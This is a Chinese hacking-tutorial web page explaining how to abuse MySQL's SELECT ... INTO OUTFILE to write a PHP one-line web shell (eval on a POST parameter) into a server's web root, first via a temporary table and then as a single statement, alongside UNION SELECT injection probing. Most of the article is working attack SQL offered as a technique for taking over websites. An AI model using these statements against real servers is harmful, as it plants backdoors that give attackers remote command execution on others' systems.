首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

浅谈MySQL导出一句话一Shell的技巧


http://www.gipsky.com/
来源: Hack Skills - 零魂 网络安全资讯小站

  昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。

  文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):

  Drop TABLE IF EXISTS temp; //如果存在temp就删掉

  Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段

  Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd]);?>'); //把一句话木马插入到temp表

  Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php

  Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)

  这几句SQL很简单,我做了简单的注释。

  不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句:

  /**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*

  然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。

  如果我们把上面这句改成/**/UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。

  也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。

  既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢。

  有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:

  Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

  这样做不但简单明了,而且避免了误删别人的数据。
<< 小技巧:wscript.shell关闭时的提权 一句即可突破防下载数据库 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备05056747号